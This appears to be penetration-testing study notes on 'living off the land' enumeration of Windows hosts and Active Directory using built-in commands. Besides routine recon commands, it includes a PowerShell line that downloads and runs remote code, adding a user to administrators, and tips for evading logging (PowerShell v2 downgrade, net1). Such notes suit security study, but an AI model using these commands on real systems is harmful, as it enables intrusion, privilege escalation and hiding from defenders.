13. Living Off the Land

Key Concepts:

• Stealth: Using built-in tools reduces the risk of detection.

• Limited Resources: Assumes a managed host with no internet access or ability to upload tools.

• Log Evasion: Techniques like downgrading PowerShell are explored.

---

1. Basic Enumeration Commands (CMD)

hostname                          # Prints the PC's name
[System.Environment]::OSVersion.Version  # Prints the OS version
wmic qfe get Caption,Description,HotFixID,InstalledOn  # Prints installed patches
ipconfig /all                     # Displays network adapter configurations
set                                # Lists environment variables
echo %USERDOMAIN%                  # Displays the domain name
echo %logonserver%                 # Prints the domain controller name
systeminfo                         # Provides a summary of host information

---

2. PowerShell Enumeration

Get-Module                          # Lists loaded modules
Get-ExecutionPolicy -List           # Prints execution policy settings
Set-ExecutionPolicy Bypass -Scope Process  # Bypasses execution policy for the current process
Get-ChildItem Env: | ft Key,Value    # Returns environment variables
Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt  # Retrieves PowerShell history
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL'); <commands>"  # Downloads and executes a file from a URL
powershell.exe -version 2           # Downgrades PowerShell to version 2
Get-MpComputerStatus                # Retrieves Windows Defender status
qwinsta                              # Lists active sessions

---

3. Network Enumeration

arp -a                               # Lists ARP table entries
route print                          # Displays the routing table
netsh advfirewall show allprofiles   # Displays firewall settings

---

4. Windows Management Instrumentation (WMI)

wmic qfe get Caption,Description,HotFixID,InstalledOn  # Prints patch information
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List  # Displays host information
wmic process list /format:list  # Lists running processes
wmic ntdomain list /format:list  # Displays domain information
wmic useraccount list /format:list  # Lists user accounts
wmic group list /format:list  # Lists local groups
wmic sysaccount list /format:list  # Dumps service account information

---

5. Net Commands

net accounts                      # Displays password requirements
net accounts /domain              # Displays domain password policy
net group /domain                 # Lists domain groups
net group "Domain Admins" /domain  # Lists domain admin users
net group "domain computers" /domain  # Lists domain computers
net group "Domain Controllers" /domain  # Lists domain controllers
net group <domain_group_name> /domain  # Lists users in a group
net groups /domain                # Lists domain groups
net localgroup                     # Lists local groups
net localgroup administrators /domain  # Lists domain administrators
net localgroup Administrators      # Displays group information
net localgroup administrators [username] /add  # Adds a user to the administrators group
net share                          # Lists shared resources
net user <ACCOUNT_NAME> /domain    # Displays user information
net user /domain                   # Lists domain users
net user %username%                # Displays current user information
net use x: \\computer\share         # Mounts a share
net view                           # Lists network computers
net view /all /domain[:domainname]  # Lists domain shares
net view \\computer /ALL            # Lists computer shares
net view /domain                   # Lists domain PCs
net1                                # A less monitored version of net

---

6. Dsquery Enumeration

dsquery user         # Lists domain users
dsquery computer     # Lists domain computers

---

gci -force .         # for hidden items

Key Takeaways

• Windows provides numerous built-in tools for AD enumeration.

• PowerShell is a powerful tool for both host and network reconnaissance.

• WMI and net commands offer extensive domain information.

• Dsquery is extremely useful for querying Active Directory.

• Downgrading PowerShell can hinder logging.

• net1 can be used to bypass some monitoring systems.